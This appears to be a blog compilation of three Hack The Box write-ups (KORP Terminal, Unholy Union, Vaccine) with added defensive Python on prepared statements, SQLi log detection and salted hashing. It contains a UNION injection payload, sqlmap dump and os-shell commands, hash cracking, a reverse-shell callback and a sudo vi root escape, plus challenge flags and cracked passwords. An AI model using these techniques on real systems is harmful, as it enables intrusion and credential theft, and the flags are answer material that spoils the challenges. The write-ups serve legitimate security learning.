KORP Terminal is a very easy web challenge created by leanthedev on Hack The Box. This challenge requires knowledge of SQL injection. Unlike previous tasks, we don't have the option to look at the source code for this challenge. Hello world, welcome to haxez where today I will be attempting to own KORP Terminal.
KORP Terminal Application Enumeration
Upon navigating to the application, we are presented with a blue background and a login box. That's it. You can view the page source but there isn't much there to view. I ran OWASP ZAP's AJAX spider and active scan against it, but it didn't find anything other than the low-hanging fruit of missing HTTP headers. The application has a login box but that's it. As a result, I attempted some default credentials such as admin / admin, but no luck.
Attacking The Application
Since there isn't anything else other than the login form, I'm going to go out on a limb and say that I'm supposed to attack that. There are multiple ways that we could attack it. For example, we could use something like Hydra to try and brute-force our way in. However, since we don't know the username, we could be here all day. Instead, let's assume that it is powered by a database and start with some basic SQL injection tests. To start with, I input a single quote into both the username and password box. As shown below, the application is indeed vulnerable to SQL injection due to the lack of prepared statements.
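The single-quote test works because the login handler builds its SQL by gluing user input into the query text. The following is an added example (not the challenge's code, whose source is not available) that reproduces the defect against a constructed in-memory SQLite table and puts the parameterised version beside it, so the difference in behaviour is visible: the concatenated query breaks on a quote and leaks a database error, the prepared one treats the quote as plain data.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the challenge's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'example-secret')")
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation, the pattern the post describes.

    Returns (authenticated, error_message_or_None). Any quote in the input
    becomes part of the SQL syntax, so a lone quote produces a parse error
    that the application then echoes back to the client.
    """
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(query).fetchone()
        return (row is not None, None)
    except sqlite3.OperationalError as exc:
        # This is the tell: the database complains about the broken query
        return (False, str(exc))


def login_prepared(conn, username, password):
    """Parameterised query: the SQL text is fixed and the values travel
    separately, so a quote in the input is just a character."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return (row is not None, None)


def demo():
    conn = build_db()
    return {
        "vulnerable_quote": login_vulnerable(conn, "'", "x"),
        "prepared_quote": login_prepared(conn, "'", "x"),
        "prepared_valid": login_prepared(conn, "admin", "example-secret"),
        "prepared_wrong": login_prepared(conn, "admin", "nope"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Note that the vulnerable path fails closed here only because the exception is caught; a handler that swallows the error and returns a generic "login failed" page would hide the tell from a scanner, which is one reason the single-quote test and a look at response timing or length is worth doing by hand.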
Preparing The Request
To attack the login form, I'm going to use sqlmap. However, first I need a valid POST request containing the username and password parameters. Did you know that if you place an asterisk (*) in the parameters of the request, sqlmap will automatically recognise them as injection points? I didn't until today. As you can see below, I found the login POST request in ZAP and copied the request to a file called request.txt.
KORP Terminal SQL Injection
To keep it short and sweet, I ran sqlmap against the request. It automatically identified the injection points and found that the form was vulnerable. Next, I simply told sqlmap to dump the database and eureka! It spat out a username and password hash. As you can see from the image below, the username is admin and the password hash appears to be a bcrypt hash (at least according to the hashcat example hashes).
Next, it was time to crack the hash. As per the link above to the hashcat example hashes, you can find the type of hash and the mode needed to crack it. I used the rockyou wordlist because it is a fairly common wordlist and most of the passwords for these challenges and the boxes tend to appear in there. After a few minutes (running in a VM because noob) I cracked the hash. As you can see from the screenshot below, the password was password123. With the username admin and the newly cracked password, I was able to log in and get the flag.
HTB{t3rm1n4l_cr4ck1ng_4nd_0th3r_sh3n4nig4n5}
KORP Terminal Learnings
Not much to say about this one. It was a nice, fun, quick challenge before I power down for the evening. I suppose a lesson that can be taken from this challenge is not to rely solely on automated scanners like Burp or OWASP ZAP's active scan. They don't always find a vulnerability that could easily be found by just submitting a single quotation mark. I find it odd that the scanner didn't pick up the error, but anyway, that's all from today.
Unholy Union is a very easy box created by Xclow3n on Hack The Box. As the name suggests, we will need some SQL skills to complete this challenge. Hello world, welcome to haxez where today I will be refreshing my SQLi skills and attempting to complete this very easy challenge. I haven’t done proper SQL injection in a while, especially UNION based injection.
Unholy Union Application Enumeration
I started by navigating to the page in my browser. With these challenges, there is usually fairly little to actually enumerate. The vulnerability tends to be fairly obvious, but it's exploiting that vulnerability that's the problem. As you can see from the image below, OWASP ZAP found the SQL injection vulnerability without issue. However, finding the vulnerability and getting the flag are two different problems entirely. I could run sqlmap against it and try to dump the whole database. Actually, that's exactly what I'm going to do.
The Easy Way With SQLMAP
First, I wanted to check if the database was vulnerable so I ran the following command and identified that there were 5 columns.
Next, I ran the following command to get the database names. I could have just dumped everything but that would be a lot of data to sort through and would take much longer. As you can see from the results below, I found three databases.
It seemed fairly obvious that the database I needed was called halloween_invetory so I specified that in the next query and used it to dump the tables in that database.
With the name of the database and the table, I was able to use sqlmap to dump the contents of the table and retrieve the flag. It was fairly obvious which table contained the flag. As you can see below, I used the following command to dump the flag and complete the challenge.
sqlmap -u http://94.237.54.42:37032/search?query= --union-cols=5 -D halloween_invetory -T flag --dump
HTB{un10n_1Nj3ct1on_15_345y_t0_l34rn_r1gh17?}
The Hard Way
I'm not going to go into too much detail on this method as I have already got the flag. However, in order to perform a UNION-based SQL injection you would first identify whether the application is vulnerable. This is often achieved by placing a single quotation mark or a backtick (`) in the query to break the syntax. As shown below, the application does produce an error message when the syntax is broken.
Next, you would determine how many columns there are by using NULL value columns. NULL is used because it carries no data and is compatible with any column type, so it shouldn't produce an error because of the type of the column it lands in. However, if the number of columns is wrong, the database will produce an error. For example, if I used three NULL columns and tried to concatenate into the fourth column, I would get an error.
Gun' UNION SELECT NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -
However, if I used 4 NULL columns and then concatenated the results into the 5th column, it worked. The syntax is correct because the original query has 5 columns. As you can see from the image below, the syntax is accepted and the data from the information schema table is dumped.
This method can then be used to find the names of the databases, tables and to eventually select the data from the flag table.
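From the defender's side, every step of the manual method above leaves a distinctive trail in the web server's access log: a lone quote that triggers a 500, then UNION SELECT with NULL placeholders, information_schema lookups and a trailing comment. The following detection logic is an added example, not part of the original post or the challenge, and runs over a few constructed Apache-style log lines that mirror the requests described in the walkthrough (the IPs, timestamps and the /search path are made up). It goes slightly beyond the text by also classifying comment-only or information_schema-only probes that lack a UNION.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the UNION-based technique; applied to the URL-decoded value.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "null_padding": re.compile(r"\bselect\b[\s,null]*\bnull\b", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
    "sql_comment": re.compile(r"(--\s*-?\s*$|#\s*$|/\*)"),
    "quote_break": re.compile(r"^[^']*'[^']*$"),  # exactly one unbalanced quote
}

# Request line and status code from a combined-format access log entry
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic from the challenge)
LOG_LINES = [
    '10.0.0.5 - - [31/Oct/2023:20:01:10 +0000] "GET /search?query=pumpkin HTTP/1.1" 200 512',
    '10.0.0.5 - - [31/Oct/2023:20:01:14 +0000] "GET /search?query=Gun%27 HTTP/1.1" 500 210',
    '10.0.0.5 - - [31/Oct/2023:20:01:30 +0000] "GET /search?query=Gun%27+UNION+SELECT+NULL%2C+NULL%2C+NULL%2C+NULL%2C+%28SELECT+GROUP_CONCAT%28SCHEMA_NAME%29+FROM+information_schema.schemata%29+--+- HTTP/1.1" 200 3120',
    '10.0.0.9 - - [31/Oct/2023:20:02:00 +0000] "GET /search?query=O%27Brien HTTP/1.1" 200 480',
]


def classify(matched, status):
    """Turn a list of matched signature names plus the HTTP status into a verdict.

    A lone quote is only reported when the server answered with a 5xx, which
    is the error-message behaviour the post relies on; a quote in a name such
    as O'Brien with a 200 response is treated as benign.
    """
    if "union_select" in matched:
        return "union_injection"
    if matched and matched != ["quote_break"]:
        return "sql_syntax_probe"
    if matched == ["quote_break"] and status >= 500:
        return "quote_probe"
    return None


def scan_log(lines):
    """Return (path, parameter, verdict, matched signatures) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        status = int(m.group("status"))
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes the values and turns '+' into spaces
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            matched = sorted(n for n, rx in SIGNATURES.items() if rx.search(value))
            verdict = classify(matched, status)
            if verdict:
                hits.append((parts.path, name, verdict, matched))
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

The status-code correlation is the part worth keeping: a quote on its own is a weak signal, but a quote followed by a server error from the same client, and then a request carrying information_schema, is the sequence a detection rule should escalate on.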
Unholy Union Learnings
I should have spent more time going through this one to do it manually, but I'm a bit short on time. It was a fun challenge anyway and it jogged my memory on a few things. I struggled with the injection syntax as it has been a long time since I have done it manually. You could argue that is why we have tools, but I don't think that's a good attitude to have. I understand the vulnerability though and how it is structured. It's just remembering what to use where.
Hello world, welcome to haxez where today we're looking at Vaccine from Hack The Box. What's that you say? You don't know where to begin when trying to hack something? Well, my old chum, I've got your back. So, provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon, you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus; however, Nmap is an essential tool that everyone should learn. So connect to the VPN, spin up the box and Nmap the heck out of it.
Vaccine Enumeration
sudo nmap -sC -sV -O -p0- 10.10.10.46
21/tcp open ftp     vsftpd 3.0.3
22/tcp open ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http    Apache httpd 2.4.41 ((Ubuntu))
FTP
As you can see from the results, port 21 (FTP, File Transfer Protocol), port 22 (SSH, Secure Shell) and port 80 (HTTP web server) are exposed (not like that). The first thing I checked was whether FTP allowed anonymous access; it didn't. I then checked the website, but it required a login. However, while performing some post-exploitation investigation on the previous box, Oopsie, I had found the FTP credentials ftpuser / mc@F1l3ZilL4.
$ ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:joe): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
226 Directory send OK.
Vaccine Hash
Huzzah! The credentials worked, and what's that? A file called backup.zip? I needed to take a look at the contents of that zip file, so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip it but it prompted me for a password. The FTP password didn't work and neither did any of the passwords from the previous boxes. Luckily, a tool exists that can be used to crack zip file passwords. zip2john creates a hash from a zip file that can then be cracked using John the Ripper.
Now that we had generated the hash, it was time to crack it using John the Ripper. In order to do this, we point john at the hash file and tell it which wordlist to use. As with all cracking, a good place to start is rockyou.txt.
┌─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for joe:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1g 0:00:00:00 DONE (2021-09-07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Woop! Looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archive appeared to contain a CSS file (Cascading Style Sheet) and an index.php file.
Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well, what do you know, it looks like the index.php file had an MD5 password hash hardcoded into the application's authentication mechanism.
A lot of MD5 password hashes can be cracked online using websites like https://crackstation.net. However, you may not always have internet access, especially if you are testing a client's internal infrastructure which doesn't have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like John the Ripper.
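The reason the index.php hash fell so quickly is that an unsalted MD5 costs one hash computation per candidate word, and the same password always yields the same hash, so a lookup site like crackstation can precompute it. The following is an added example (not the box's code) that shows that property with a small constructed wordlist and puts a salted, iterated PBKDF2-HMAC-SHA256 store next to it, along with a helper for spotting legacy unsalted MD5 values in a credentials table. The 600,000 iteration count follows the OWASP password storage guidance for PBKDF2-HMAC-SHA256; the storage format string is my own.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 600_000  # OWASP recommendation for PBKDF2-HMAC-SHA256 (assumed current)
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$", re.I)


def md5_hex(password):
    """The hardcoded scheme found in index.php: unsalted, single-pass MD5."""
    return hashlib.md5(password.encode()).hexdigest()


def wordlist_match(md5_hash, words):
    """Mirror what hashcat does against an unsalted hash: hash each candidate
    once and compare. No salt and no work factor means this is as cheap as it
    gets, and one pass serves every user who chose the same password."""
    target = md5_hash.lower()
    for word in words:
        if md5_hex(word) == target:
            return word
    return None


def hash_password(password, salt=None):
    """Store as algorithm$iterations$salt$derived_key so the parameters travel
    with the hash and can be raised later without breaking verification."""
    salt = salt or os.urandom(16)  # per-user random salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored parameters and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format: " + algo)
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


def is_legacy_md5(stored):
    """Flag a bare 32-hex-character value, the shape of an unsalted MD5 hash."""
    return bool(LEGACY_MD5.match(stored))


if __name__ == "__main__":
    # Constructed mini wordlist; the password itself is the one the post cracked
    words = ["123456", "password", "letmein", "qwerty789"]
    legacy = md5_hex("qwerty789")
    print("unsalted MD5 recovered:", wordlist_match(legacy, words))
    stored = hash_password("qwerty789")
    print("same password, salted store:", stored)
    print("verify ok:", verify_password("qwerty789", stored))
    print("legacy detected:", is_legacy_md5(legacy), is_legacy_md5(stored))
```

Salting does not stop a wordlist attack against one account; it removes the precomputation shortcut and forces one full derivation per candidate per user, and the iteration count makes each of those derivations slow. A migration path that rehashes on the user's next successful login is the usual way to retire the MD5 values the detector flags.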
The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to log in to the website with the newly cracked password. Upon login, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell sqlmap to authenticate against the application. In order to do this, I inspected the website and nabbed my PHPSESSID cookie.
Vaccine SQL Injection
The first few attempts to scan the host with sqlmap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute-forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won't show as vulnerable when scanned again, not 100% sure why (weird). Anyway, after requesting to reset the box a billion times, I was finally able to see that the search parameter was vulnerable to SQL injection.
┌─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a"
[*] starting @ 20:08:00 /2021-09-07/
[20:08:01] [INFO] testing connection to the target URL
[20:08:02] [INFO] testing if the target URL content is stable
[20:08:02] [INFO] target URL content is stable
[20:08:02] [INFO] testing if GET parameter 'search' is dynamic
[20:08:02] [INFO] GET parameter 'search' appears to be dynamic
[20:08:02] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
---SNIP---
[20:08:09] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[20:08:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:08:12] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[20:08:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
It was time to see whether we could get a shell on the box through sqlmap.
┌─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a" --os-shell
[*] starting @ 20:08:20 /2021-09-07/
[20:08:22] [INFO] resuming back-end DBMS 'postgresql'
[20:08:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
---SNIP---
[20:08:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[20:08:23] [INFO] fingerprinting the back-end DBMS operating system
[20:08:24] [INFO] the back-end DBMS operating system is Linux
[20:08:24] [INFO] testing if current user is DBA
[20:08:25] [INFO] retrieved: '1'
[20:08:25] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[20:08:25] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
Brilliant, this gave us an os-shell. In order to upgrade it to a full shell, I needed to create a netcat listener and run a command on the server to get it to connect back to my host. First, I created the netcat listener.
The command worked and the target server connected back to the netcat listener on my host.
10.10.10.46: inverse host lookup failed: Unknown host
connect to [10.10.15.199] from (UNKNOWN) [10.10.10.46] 38336
bash: cannot set terminal process group (1502): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami
postgres
Now that I had access to the server, it was time to perform some further investigation. I checked the shell history and then started looking through the website files. I found one file called dashboard.php.
Bingo, we found a PHP database connection string with the postgres user's password. I was then able to use the password to see what the postgres user had permission to run with sudo.
postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
It appeared that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool as root. This was great news, as vi can run shell commands from its command line. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command via sudo, you can press escape and then type :!/bin/bash. This drops you into a root shell where you can snag the root.txt file. There is no user.txt file on this target.